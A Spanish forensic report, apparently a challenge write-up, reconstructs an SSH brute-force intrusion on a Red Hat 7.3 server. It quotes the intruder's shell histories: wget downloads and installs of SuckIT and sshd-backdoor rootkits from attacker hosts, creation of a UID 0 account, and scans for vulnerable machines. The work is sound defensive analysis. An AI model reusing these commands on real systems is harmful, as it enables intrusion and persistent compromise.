INFORME TÉCNICO – ANÁLISIS FORENSE

INFORME TÉCNICO–ANÁLISIS FORENSEHostname: finanzasS.O.: Red Hat Linux versión 7.3 (Valhalla)Autor: Rafael García O.

ÍNDICEINTRODUCCIÓN 1Breve descripción de lo que nos acontecePRIMEROS PASOS 1Preparando el sistema¿POR DÓNDE NOS MOVEMOS? 1Descubriendo información sobre la víctimaBUSCANDO POR DÓNDE EMPEZAR 2Orientando la investigaciónCREANDO LA LÍNEA DE TIEMPO 3Descubriendo cuándo hizo cada acciónCREANDO LA LÍNEA DE TIEMPO II 7El gran hallazgo, el cómoRECAPITULANDO 8Organizando los hallazgosPROFUNDIZANDO EN EL QUÉ HIZO 9¿A qué dedicó el tiempo el intruso?CREANDO LA LÍNEA DE TIEMPO III 11Su último movimientoDESPEDIDA Y CIERRE 12Palabras del autorAPÉNDICE I 13Listado de ficheros modificados(del 29 al 31)APÉNDICE II 16Listado ficheros infectados por el virusListado de troyanos en el sistema(chkrootkit)

INTRODUCCIÓNA lo largo de este informe intentaremos responder a las siguientespreguntas:– ¿Cómo lo hizo?– ¿Qué hizo?– ¿Quién lo hizo?– ¿Desde dónde lo hizo?– ¿Cuándo?Las imágenes del disco duro fueron analizados con las herramientasbásicas de un sistema Linux y otras basadas en The Coroner's Toolkit(TCT), Sleuth Kit con su front-end Autopsy.Debido a que esta es una nueva ciencia – análisis forense decomputadores - para mi es informe mostrara la metodología usada y quizápueda servir para fines didácticos.PRIMEROS PASOSPara empezar a andar descargamos del servidor las imágenes cedidaspor el Departamento de Seguridad en Cómputo y las descomprimimos.Lo siguiente que se hizo fue verificar los checksum de lasimágenes, todas coincidieron, lo que demuestra que se hicieroncorrectamente.El paso siguiente es montar las imágenes en modo lectura, sinejecución e ignorando los dispositivos.$sudo mount -o ro,loop,noexec /media/hda1.dd discoAl movernos por la partición montada vemos el fichero /etc/mtab yobservamos que el disco duro está particionado de la siguiente manera:hda1 / Raízhda2 /home Directorio de los usuarioshda3 /var Datos variables(caches, correos, logs ...)hda5 /usr Programas de usuario, documentación,...hda6 swap Memoria de intercambioCon el comando anterior montaremos las particiones tal y como nosindica el fichero mtab, dando por finalizado este apartado.¿POR DÓNDE NOS MOVEMOS?Cada sistema Linux/Unix tiene sus particularidades, para nollevarnos ninguna sorpresa identificaremos el sistema. Empezaremos por elarranque, al entrar al directorio /boot vemos que usa GRUB, veamos elfichero menu.lst$ sudo less boot/grub/menu.lst...#boot=/dev/hdadefault=0timeout=10

splashimage=(hd0,0)/boot/grub/splash.xpm.gztitle Red Hat Linux (2.4.18-3)...Sabiendo que se trata de Linux Red Hat (2.4.18-3) vamos a mirar elcontenido del fichero /etc/redhat-release (he aquí una particularidad deesta distribución).$ sudo less /etc/redhat-releaseRed Hat Linux release 7.3 (Valhalla)Siguiendo con las particularidades de esta distribución, vamosconocer las IPs que tenía esta máquina y su nombre de red para ello:$ sudo less /etc/hosts# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 finanzas localhost.localdomain localhost$ ls -l /etc/sysconfig/network-scripts/-rw-r—r-- 1 root root 133 2005-01-20 23:28 ifcfg-eth0-rw-r—r-- 1 root root 135 2005-01-20 23:29 ifcfg-eth0:1...$ less /etc/sysconfig/network-scripts/ifcfg-eth0DEVICE=eth0BOOTPROTO=staticBROADCAST=192.168.200.255IPADDR=192.168.200.128NETMASK=255.255.255.0NETWORK=192.168.200.0ONBOOT=yes$ less /etc/sysconfig/network-scripts/ifcfg-eth0:1DEVICE=eth0:1BOOTPROTO=staticBROADCAST=192.168.100.255IPADDR=192.168.100.188NETMASK=255.255.255.0NETWORK=192.168.100.0ONBOOT=yesYa tenemos el nombre de la maquina que es FINANZAS, la cual tenia 2IPS la 192.168.200.128 y la 192.168.100.188.Hemos recolectado la información necesaria para poder empezar ahacer camino (se hace camino al andar...).BUSCANDO POR DÓNDE EMPEZARPensando como si nos trataramos del intruso hemos de intentaranalizar su objetivo basico, una cuenta con permisos de administrador.Para ello hacemos un listado del directorio /etc y analizamos los

ello. También cabe la posibilidad de que le interesara dejar el virusinstalado por si el administrador detectaba las puertas traserasinstaladas. Ambas situaciones son viables.También me parece curioso el fichero que hay entre webalizer.hist yweed, si te fijas no tiene nombre (en realidad es un espacio en blanco).La verdad es que el listado ha sido muy productivo porque vemos quehay ficheros que hacen referencia a psybnc (un bouncer) a pscan (portscanner), etc...En el listado vemos que nos ha dejado historiales de bash, sonfichero que almacenan todos los comandos ejecutados por cada usuario. Elsiguiente en nuestra línea de tiempo (29-01-2005 15:22:20) sería elhistorial del usuario root veamos el contenido:$ sudo cat root/.bash_historylsdirps xcwget xhack.150m.com/sc.tgztar -zxvf sc.tgzcd sc./inst./skwwget xhack.150m.com/httpsperl httpscd ..rmrm -rf sc*Conecto a xhack.150.com y descargó(seguramente) un rootkit y loinstaló. Hagamos nosotros lo mismo (excepto instalarlo), lo descargamos ymiramos exactamente qué hay. Nos salen tres ficheros: inst, login y sk.Mirando con less vemos que el primero es un script:1.- Crea el directorio/usr/share/.X12-kernel y se desplaza allí.2.- Crea un fichero llamado .sniffer3.- Genera el fichero sk (mediante un echo con el código binariocomprimido y lo descomprime)4.- Luego crea una copia del fichero /sbin/init llamándola /sbin/initsk125.- Copia sk encima /sbin/initLos otros dos ficheros son binarios, sacaremos mas información deellos con file:$ file loginlogin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped$ file sksk: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),statically linked, strippedAl ejecutar el comando strings con el fichero login he identificado

el rootkit: SuckIT. Es capaz de ocultar PID's , ficheros, conexiones(tcp, udp y raw), también integra un shell TTY para acceso remoto(ficherologin). Otros ficheros relacionados con SuckIT son /etc/ld.so.hash y /etc/ld.so.cache (donde se guardan opciones definidas en la instalación,están encriptadas).Acto seguido lo que hace es descargar el fichero https que es unscript en perl que se encarga de conectar al un servidor de IRC, en estecaso a eu.undernet.org(puerto 6667) , al canal aseasi. Dejando la máquinaconectada esperando instrucciones, dejándola lo que se considera zombie.Después el intruso borró las evidencias.Todo esto lo debió hacer conectando por SSH porque la hora demodificación del fichero /root/.bash_history es 15:22:20 y la del .ssh esdos segundos más tarde (15:22:22).El siguiente historial se encuentra en el directorio raíz, algopoco frecuente. Puede ser que accediera desde la puerta trasera instaladay no se diera cuenta de que había creado un fichero de registro allí.Miremos el contenido de este fichero:$ sudo less .bash_historyid/usr/sbin/adduser -g 0 -u 0 -o weedpasswd weed/sbin/ifconfig | grep "inet"ls -sadir/usr/sbin/userdel weedls -sadirrm -rf za*rm -rf own/usr/sbin/adduser -g 0 -u 0 -o weedpasswd weedwget www.zetu.as.ro/crk.tar.gztar xzvf crk.tar.gzcd crk./install eliteaza 1idsucd crkdir./install eliteaz 9933SSH -l weed localhostls -sadirpasswd weedSSH -l weed localhosteliteazazeluserdel weed/usr/sbin/userdel weedls =-sadirrm -rf owncd scdircd ..

m -rf sc*cd /var/logdirmkdir daemonwget www.zetu.as.ro/picochmod +x picomv pico " "" "/usr//sbin/killall -9 zbind/usr/sbin/killall -9 zbind/usr/bin/killall -9 zbindexport PATH="."Veamos, crea el usuario weed. También que descarga crk.tar.gz y loinstala. El fichero crk es un backdoor para el demonio sshd (le puso elpassword eliteaz y abrió el puerto 9933), más adelante haremos unanálisis detallado. Comprueba que el backdoor se ha instalado intentandoconectar al servicio de SSH. Descubrimos el fichero que era mostrado comoun espacio en blanco por ls, era el editor pico(una versión troyanizada)que renombró al pico original, la ejecuto y he hizo una copia dejándoleel nombre de fichero como un espacio en blancoAnalicemos los dos ficheros: crk y pico. Al descomprimir ydesempaquetar crk nos encontramos con lo siguiente:-rw-r—r-- 1 leptom leptom 430885 2002-01-14 07:42 bin.tgz-rw-r—r-- 1 leptom leptom 519 2002-10-06 04:51 conf.tgz-rwxr-xr-x 1 leptom leptom 6427 2005-01-05 09:10 install-rw-r—r-- 1 leptom leptom 28999 2001-01-12 13:15 lib.tgzEl script install paso a paso:– Descomprime los ficheros tgz y los borra.– Acto seguido mata el demonio syslogd, así no quedanregistradas las acciones en el sistema.– También hace alguna modificación al fichero /bin/login(29-01-2005 15:36).– Y comienza la instalación del rootkit realmente.– Como nuestro intruso le pasó un puerto y una clave elscript install se encarga de codificar la clave y guardarlaen: /etc/ld.so.hash y /lib/libext-2.so.7 (29-01-200515:21:50).– Copia el contenido de conf.tgz en /usr/include (es fácilidentificarlos por la fecha).– Se instala como servicio en el arranque(/etc/rc.d/init.d/cycomm)Dentro del fichero conf.tgz hay un fichero llamado lidps1.h queindica los procesos a ocultar.Mirando con un poco de detenimiento el fichero login modificado:$ strings bin/login | less...Login incorrectmainlogin: Out of memoryOut of memoryinitgroups: %m.hushlogin%s/%s

ssh2...Received disconnect from 67.19.122.170: 11: Bye ByeEl intruso se dedicó a crackear el ordenador de manera automática.A lo largo del fichero se ve todos los intentos realizados, segun ladificultad del password del root esto podría ser la causa de laintrusión.En la cabecera del primer mail se ve la fecha de inicio que es 21-01-2005 04:02:01. Revisando todo el fichero logra acceder el 29-01-200515:30:00. Las horas de inicio y fin no son exactas (es la hora de lallegada del mail). El día del acceso se deduce porque el mail ese díaavisa de la ausencia del fichero de log del SSH.El administrador debiera haberse percatado de que estaba padeciendoun ataque, tenía una cantidad de mails con más de 10.000 avisos deintentos de acceso fallidos.El intruso usó varias máquinas para acceder, otros servidoreszombie (como este):61.220.91.20 Taiwan63.247.140.66 Australia64.151.73.180 Australia67.19.122.170 Australia67.19.179.50 Australia81.181.141.21 Amsterdam148.231.192.8 Mexico159.148.91.124 Latvia195.159.120.8 Noruega203.131.125.156 Australia209.0.206.183 Colorado209.152.182.194 Colorado210.0.186.2 Australia211.251.242.68 Australia212.93.136.214 Romanía216.116.104.39 California218.151.155.35 Australia218.200.36.124 Australiainformación sacada de http://mendoza777.en.eresmas.com/localizador_de_ip.htmAl ver todas estas direcciones y los “saltos” que da me temo quetiene muchas máquinas zombies. Curiosamente una es de Romanía, quizá elintruso se impacientó y lo hizo desde su propio ordenador.RECAPITULANDORespondiendo a las preguntas iniciales ya sabemos:– Cómo accedió al sistema: crackeando una cuenta remota delservidor SSH– Desde dónde lo hizo: Listado de IPs previo)– Quién lo hizo: Su posible nacionalidad es Rumana– Cuándo lo hizo: 29-01-2005 aprox. 15:15:00– Qué hizo: instalar troyanos, enviarse datos sobre el host,dejar la máquina zombie...

PROFUNDIZANDO EN EL QUÉ HIZOCon el informe así ya podríamos ser capaces de localizar al intruso(con el listado de IPs poniéndose en contacto con los diferentes ISPs)pero aun nos quedan muchos cabos por atar, por ejemplo al principio vimos“rastros” de un bouncer.Prosigamos mirando la lista de ficheros modificados el 29. Le tocael turno al directorio w00t, se encuentra en /var/tmp/w00t, pero justoantes de llegar hay más directorios y archivos “interesantes”.$ ls -altotal 1304drwxrwxrwt 5 root root 4096 2005-01-31 18:54 .drwxr-xr-x 20 root root 4096 2005-01-20 16:57 ..-rw------- 1 root root 606 2005-01-31 19:03 .bash_historydrwxr-xr-x 8 657 226 4096 2005-01-31 10:12 psybnc-rw-r—r-- 1 root root 957521 2004-07-28 01:14 psybnc.tgzdrwxr-xr-x 2 505 505 4096 2005-01-31 19:02 selena-rw-r—r-- 1 root root 342006 2004-11-27 13:17 selena.tgzdrwxr-xr-x 2 523 523 4096 2005-01-29 22:36 w00tListaremos el contenido de bash_history, pero hemos de fijarnos enque el directorio w00t es del día 29 y el resto del 31:$ sudo less .bash_historywcd /var/tmpls -sadirrm -rf /tmp/*cd /var/logdirexitidcd /var/tmplsdirwget www.zetu.as.ro/woot.tgztar xvfz woot.tgzcd w00t./asmb 200.207lsdircd /dev/shmdir

wget www.zetu.as.ro/psyz.tar.gztar xzvf psyz.tar.gzrm -rf psyz.tar.gzmv psybnc localcd localrm -rf psybnc.conf*wget www.zetu.as.ro/psybnc/psybnc.confmv psybnc "ps ax"export PATH=".""ps ax"cd var/tmpdirrm -rf woot.tgzdirwget www.zetu.as.ro/psybnc.tgztar xvfz psybnc.tgzcd psybnc./psybncwexitwps auxcd /var/tmplsdirwget http://www.plus.factory.home.ro/selena.tgztar xvfz selena.tgzcd selena./assl 217.172Lo primero que hace es descargar w00t.tgz que son una serie deutilidades. Después hace un escaneo de la red de la clase B 200.207buscando máquinas con el puerto de netbios abierto(139).Luego descargó e instaló el psyz, que es el psybnc con el nombrecambiado (un bouncer para conectar al IRC). Mas información enhttp://www.psybnc.info/Descargo un fichero llamado selena.tgz donde tiene una serie deexploits y utilidades, entre ellas un script llamado assl que lo utilizóbuscando más ordenadores con assl(escaner que buscar servidores apachecon OpenSSL vulnerable) en la red 217.172.

El intruso dejó en este caso mucha “basura” por los directorios.Continuando con la lista de lo que pasó el día 29 tenemos ficherosque hacen referencia al webalizer (aplicación para analizar los logs delservidor web), pero no observo nada que llame la atención. Sin embargo,los siguientes ficheros son del bouncer instalado pero uno si que esinteresante el var/tmp/psybnc/motd/USER1.MOTD nos indica la primeraconexión que hizo al irc por medio de esta máquina(29-01-2005 15:49).Retrocediendo en el árbol de directorio observamos que hay unfichero llamado USER1.log:$ sudo cat USER1.LOG~Mon Jan 31 03:12:48 :(JustPain!~Just@JustPain.users.undernet.org)wa mui baga aazeii aia ji la mine ..No se lo que pone, pero... quizá sea rumano(nos acercaría a ladirección de mail que teníamos anteriormente).De esta manera hemos revisado manualmente todos los ficheros modificadosel día 29.CREANDO LÍNEA DE TIEMPO IIITal como hicimos al principio sacamos un listado de todos losficheros modificados el día 29. Ahora haremos lo mismo pero con los díasposteriores hasta que el 31 (último momento en que la máquina estuvoactiva).Intentando seleccionar los ficheros más relevantes del día 30, veoque el primer fichero del listado(véase Apéndice I) es el cp, no le veonada aparentemente raro. Pero,¿qué pasa con el virus? El virus ha podidoestar infectando ficheros en este tiempo.Barajando esta posibilidad iré a ficheros en concreto que no puedanhaber sido descargados por el intruso, al final en el Apéndice IIencontrarás un listado de ficheros afectados por el virus y un script quelocalicé por internet que busca ficheros afectados por este virus.Como a simple vista no hay nada “interesante”, generamos la listade los ficheros modificados el día 31. Hay muchos ficheros que ya losvimos anteriormente.Advierto dos ficheros que pertenecen a la cola de correo que elusuario root ha enviado, pero que todavía no han salido(var/spool/mqueue). Entre los dos ficheros forman un mail enviado de laWAMU (Washington Mutual) para que confirme su cuenta “on line” bancaria.Al mirar el adjunto vemos que hay un link a una página segura,supuestamente del servidor de wamu, pero no, el link te lleva a200.180.33.94 (que no tiene nada que ver con la Wamu). Esta IP pertenecea la LACNIC(www.lacnic.net) allí haciendo una consulta vemos que la ippertenece a un dominio brasileño.Fraudes por correo electrónico? robo de contraseñas? el intruso deeste sistema apunta lejos ;-)

DESPEDIDA Y CIERRE- omitido -

APENDICE IListado de ficheros modificados día 29-rw------- 1 root root 665 2005-01-29 22:27 .bash_historydrwxr-xr-x 18 root root 86016 2005-01-29 22:16 devdrwxr-xr-x 39 root root 4096 2005-01-29 22:25 etcdrwxr-xr-x 5 root root 4096 2005-01-29 22:17 homedrwxr-xr-x 7 root root 4096 2005-01-29 22:21 libdrwxr-x--- 3 root root 4096 2005-01-29 22:22 rootdrwxr-xr-x 2 root root 4096 2005-01-29 22:22 sbin-rwxr-xr-x 1 root root 20776 2005-01-29 22:21 chmod-rwxr-xr-x 2 root root 252844 2005-01-29 22:16 gawk-rwxr-xr-x 2 root root 252844 2005-01-29 22:16 gawk-3.1.0---------- 1 root root 0 2005-01-29 22:16 hdx1---------- 1 root root 0 2005-01-29 22:16 hdx2-rw-r--r-- 1 root root 23926 2005-01-29 22:21 ld.so.cache-rwxrwxrwx 1 root root 14 2005-01-29 22:21 ld.so.hash-rw-r--r-- 1 root root 1381 2005-01-29 22:25 passwd-rw------- 1 root root 1414 2005-01-29 22:18 passwd--r-------- 1 root root 921 2005-01-29 22:25 shadow-rw------- 1 root root 980 2005-01-29 22:22 shadowdrwxr-xr-x2 root root 4096 2005-01-29 22:21 init.d-rwxr-xr-x 1 root root 55 2005-01-29 22:21 cycommdrwx------ 2 root root 4096 2005-01-29 22:17 weed-rw-r--r-- 1 root root 24 2005-01-29 22:17 .bash_logout-rw-r--r-- 1 root root 191 2005-01-29 22:17 .bash_profile-rw-r--r-- 1 root root 124 2005-01-29 22:17 .bashrc-rwxr-xr-x 1 root root 14 2005-01-29 22:21 libext-2.so.7lrwxrwxrwx 1 root root 16 2005-01-29 22:19 libproc.so ->libproc.so.2.0.6-rw------- 1 root root 133 2005-01-29 22:22 .bash_historydrwx------ 2 root root 4096 2005-01-29 22:22 .ssh-rw-r--r-- 1 root root 219 2005-01-29 22:22 known_hosts-rwxr-xr-x 1 root root 33348 2005-01-29 22:22 init-rwxr-xr-x 1 root root 26920 2005-01-29 22:22 initsk12-rw-r--r-- 1 root root 0 2005-01-29 22:27 .infodrwxr-xr-x 64 root root 8192 2005-01-29 22:21 include-rw-r--r-- 1 500 500 154 2005-01-29 22:21 hosts.h-rw-r--r-- 1 root root 1987 2005-01-29 11:02 webalizer.current-rw-r--r-- 1 root root 27 2005-01-29 11:02 webalizer.hist-rwxr-xr-x 1 root root 24056 2005-01-29 22:26-rw-rw---- 1 root root 0 2005-01-29 22:17 weeddrwxr-xr-x 2 523 523 4096 2005-01-29 22:36 w00tdrwxr-xr-x 2 657 226 4096 2005-01-29 22:48 logdrwxr-xr-x 2 657 226 4096 2005-01-29 22:49 motd-rw------- 1 root root 7 2005-01-29 22:46 psybnc.pid-rw------- 1 root root 356 2005-01-29 22:46 psybnc.log-rw------- 1 root root 0 2005-01-29 22:48 USER1.TRL-rw------- 1 root root 1543 2005-01-29 22:49 USER1.MOTD-rw-r--r-- 1 root root 0 2005-01-29 22:36 200.207.pscan.139-rw-r--r-- 1 root root 2293 2005-01-29 11:02ctry_usage_200501.png-rw-r--r-- 1 root root 2723 2005-01-29 11:02daily_usage_200501.png-rw-r--r-- 1 root root 1701 2005-01-29 11:02hourly_usage_200501.png-rw-r--r-- 1 root root 3679 2005-01-29 11:02 index.html-rw-r--r-- 1 root root 49371 2005-01-29 11:02 usage_200501.html-rw-r--r-- 1 root root 2105 2005-01-29 11:02 usage.pngListado de ficheros modificados día 30

-rwxr-xr-x 1 root root 45119 2005-01-30 11:22 cpdrwx------ 2 root root 4096 2005-01-30 11:02 logwatch.XXLltDIYdrwx------ 2 root root 4096 2005-01-30 11:22 makewhatisLZwx4zdrwx------ 2 root root 4096 2005-01-30 11:02 makewhatisnuAB1j-rw-r--r-- 1 root root 0 2005-01-30 11:02 cron-rw-r--r-- 1 root root 0 2005-01-30 11:02 maillog-rw-r--r-- 1 root root 0 2005-01-30 11:02 messages-rw-r--r-- 1 root root 0 2005-01-30 11:02 samba-rw-r--r-- 1 root root 0 2005-01-30 11:02 secure-rw-r--r-- 1 root root 0 2005-01-30 11:02 xferlog-rw-r--r-- 1 root root 88032 2005-01-30 11:22 wdrwxrwxr-x 3 root 54 4096 2005-01-30 11:22 lock-rw-r--r-- 1 root root 0 2005-01-30 11:22 whatis-rw-r--r-- 1 root root 0 2005-01-30 11:22 makewhatis.lock-rw------- 1 root root 9 2005-01-30 11:22 cron.weekly-rw------- 1 root root 0 2005-01-30 11:02 dfj0UA22F27603-rw------- 1 root root 0 2005-01-30 11:02 xfj0UA22F27603-rw------- 1 root root 671 2005-01-30 00:53 psybnc.conf-rw------- 1 root root 671 2005-01-30 00:53 psybnc.conf.oldListado de ficheros modificados día 31drwxrwxrwt 5 root root 4096 2005-01-31 20:31 tmp-rwxr-xr-x 1 root root 25183 2005-01-31 19:03 chgrp-rwxr-xr-x 1 root root 27039 2005-01-31 19:03 chown-rwxr-xr-x 1 root root 73464 2005-01-31 19:03 cpio-rwxr-xr-x 1 root root 37375 2005-01-31 19:03 dd-rwxr-xr-x 1 root root 35135 2005-01-31 19:03 df-rwxr-xr-x 1 root root 91823 2005-01-31 19:03 ed-rwxr-xr-x 1 root root 21185 2005-01-31 19:03 hostname-rwxr-xr-x 1 root root 28863 2005-01-31 19:03 ln-rwxr-xr-x 1 root root 55647 2005-01-31 19:03 ls-rwxr-xr-x 1 root man 75251 2005-01-31 19:03 mail-rwxr-xr-x 1 root root 26751 2005-01-31 19:03 mkdir-rwxr-xr-x 1 root root 24319 2005-01-31 19:03 mknod-rwxr-xr-x 1 root root 12995 2005-01-31 19:03 mktemp-rwxr-xr-x 1 root root 21711 2005-01-31 19:03 mt-rwxr-xr-x 1 root root 108932 2005-01-31 19:03 netstat-rwsr-xr-x 1 root root 43951 2005-01-31 19:03 ping-rwxr-xr-x 1 root root 25459 2005-01-31 19:03 setserialdrwxr-xr-x 2 root root 4096 2005-01-31 22:25 mrtg-rw-r--r-- 1 root root 628 2005-01-31 22:20 statistics-rw-r--r-- 1 root root 0 2005-01-31 22:25 mrtg.okdrwxr-xr-x 2 root root 4096 2005-01-31 11:02 logdrwxrwxrwt 5 root root 4096 2005-01-31 18:54 tmp-rw-r--r-- 1 root root 665 2005-01-31 11:02 logrotate.statusdrwxr-xr-x 2 37 operator 4096 2005-01-31 11:02 rpmdrwxr-x--- 2 root fax 4096 2005-01-31 11:12 slocate-rw-r----- 1 root fax 509509 2005-01-31 11:12 slocate.db-rw-r--r-- 1 root root 9209 2005-01-31 11:02 rpmpkgsdrwxrwxr-x 2 root man 4096 2005-01-31 22:20 maildrwxr-xr-x 2 root man 4096 2005-01-31 22:20 mqueue-rw------- 1 root root 9 2005-01-31 11:02 cron.daily-rw------- 1 root root 583353 2005-01-31 22:20 root-rw------- 1 root root 6500 2005-01-31 20:31 dfj0VJV0A25551-rw------- 1 root root 654 2005-01-31 21:59 qfj0VJV0A25551-rw------- 1 root root 606 2005-01-31 19:03 .bash_historydrwxr-xr-x 8 657 226 4096 2005-01-31 10:12 psybncdrwxr-xr-x 2 505 505 4096 2005-01-31 19:02 selena-rw------- 1 root root 105 2005-01-31 10:12 USER1.LOG-rw-r--r-- 1 root root 33611 2005-01-31 19:02 217.172.pscan.443-rw-r--r-- 1 root root 33611 2005-01-31 19:02 217.172.ssl-rw-r--r-- 1 root root 11111 2005-01-31 19:03 217.172.ssl.out-rwxr-xr-x 1 505 505 18696 2005-01-31 19:02 oops

-rwxr-xr-x 1 505 505 46379 2005-01-31 19:03 ssl-rwxr-xr-x 1 505 505 23070 2005-01-31 19:03 sslex-rwxr-xr-x 1 505 505 46218 2005-01-31 19:03 sslx-rwxr-xr-x 1 505 505 29061 2005-01-31 18:54 ssvuln-rwxr-xr-x 1 505 505 46218 2005-01-31 19:03 ssx

APENDICE IIListado de ficheros infectados por Linux.RSTFichero: disco/bin/chgrp INFECTADOFichero: disco/bin/chmod INFECTADOFichero: disco/bin/chown INFECTADOFichero: disco/bin/cp INFECTADOFichero: disco/bin/cpio INFECTADOFichero: disco/bin/dd INFECTADOFichero: disco/bin/df INFECTADOFichero: disco/bin/ed INFECTADOFichero: disco/bin/gawk INFECTADOFichero: disco/bin/gawk-3.1.0 INFECTADOFichero: disco/bin/hostname INFECTADOFichero: disco/bin/ln INFECTADOFichero: disco/bin/ls INFECTADOFichero: disco/bin/mail INFECTADOFichero: disco/bin/mkdir INFECTADOFichero: disco/bin/mknod INFECTADOFichero: disco/bin/mktemp INFECTADOFichero: disco/bin/mt INFECTADOFichero: disco/bin/netstat INFECTADOFichero: disco/bin/ping INFECTADOFichero: disco/bin/setserial INFECTADOFichero: disco/sbin/init INFECTADOROOTDIR is `/'Checking `amd'... not foundChecking `basename'... not infectedChecking `biff'... not foundChecking `chfn'... not infectedChecking `chsh'... not infectedChecking `cron'... not infectedChecking `date'... not infectedChecking `du'... not infectedChecking `dirname'... not infectedChecking `echo'... not infectedChecking `egrep'... not infectedChecking `env'... not infectedChecking `find'... not infectedChecking `fingerd'... not infectedChecking `gpm'... not infectedChecking `grep'... not infectedChecking `hdparm'... not infectedChecking `su'... not infectedChecking `ifconfig'... not infectedChecking `inetd'... not testedChecking `inetdconf'... not foundChecking `identd'... not infectedChecking `init'... not infectedChecking `killall'... not infectedChecking `ldsopreload'... not infectedChecking `login'... not infectedChecking `ls'... not infectedChecking `lsof'... not foundChecking `mail'... not infectedChecking `mingetty'... not infectedChecking `netstat'... not infectedChecking `named'... not infectedListado de ficheros troyanizados(salida de chkrootkit)

Checking `passwd'... not infectedChecking `pidof'... not infectedChecking `pop2'... not foundChecking `pop3'... not foundChecking `ps'... not infectedChecking `pstree'... not infectedChecking `rpcinfo'... not infectedChecking `rlogind'... not infectedChecking `rshd'... not infectedChecking `slogin'... not infectedChecking `sendmail'... not foundChecking `sshd'... not infectedChecking `syslogd'... not infectedChecking `tar'... not infectedChecking `tcpd'... not infectedChecking `tcpdump'... not infectedChecking `top'... not infectedChecking `telnetd'... not infectedChecking `timed'... not foundChecking `traceroute'... not infectedChecking `vdir'... not infectedChecking `w'... not infectedChecking `write'... not infectedChecking `aliens'... /etc/ld.so.hashSearching for sniffer's logs, it may take a while... nothing foundSearching for HiDrootkit's default dir... nothing foundSearching for t0rn's default files and dirs... nothing foundSearching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkitinstalledSearching for Lion Worm default files and dirs... nothing foundSearching for RSHA's default files and dir... nothing foundSearching for RH-Sharpe's default files... nothing foundSearching for Ambient's rootkit (ark) default files and dirs... nothing foundSearching for suspicious files and dirs, it may take a while.../usr/lib/perl5/5.6.1/i386-linux/.packlistSearching for LPD Worm files and dirs... nothing foundSearching for Ramen Worm files and dirs... nothing foundSearching for Maniac files and dirs... nothing foundSearching for RK17 files and dirs... nothing foundSearching for Ducoci rootkit... nothing foundSearching for Adore Worm... nothing foundSearching for ShitC Worm... nothing foundSearching for Omega Worm... nothing foundSearching for Sadmind/IIS Worm... nothing foundSearching for MonKit... nothing foundSearching for Showtee... Warning: Possible Showtee Rootkit installedSearching for OpticKit... nothing foundSearching for T.R.K... nothing foundSearching for Mithra... nothing foundSearching for OBSD rk v1... nothing foundSearching for LOC rootkit... nothing foundSearching for Romanian rootkit... /usr/include/file.h /usr/include/proc.hSearching for HKRK rootkit... nothing foundSearching for Suckit rootkit... Warning: /sbin/init INFECTEDSearching for Volc rootkit... nothing foundSearching for Gold2 rootkit... nothing foundSearching for TC2 Worm default files and dirs... nothing foundSearching for Anonoying rootkit default files and dirs... nothing foundSearching for ZK rootkit default files and dirs... nothing foundSearching for ShKit rootkit default files and dirs... Possible ShKit rootkitinstalledSearching for AjaKit rootkit default files and dirs... nothing foundSearching for zaRwT rootkit default files and dirs... nothing foundSearching for Madalin rootkit default files... nothing found

Searching for anomalies in shell history files... nothing foundChecking `asp'... not infectedChecking `bindshell'... not testedChecking `lkm'... not testedChecking `rexedcs'... not foundChecking `sniffer'... not testedChecking `w55808'... not infectedChecking `wted'... Checking `scalper'... not infectedChecking `slapper'... not infectedChecking `z2'... not tested: not found wtmp and/or lastlog file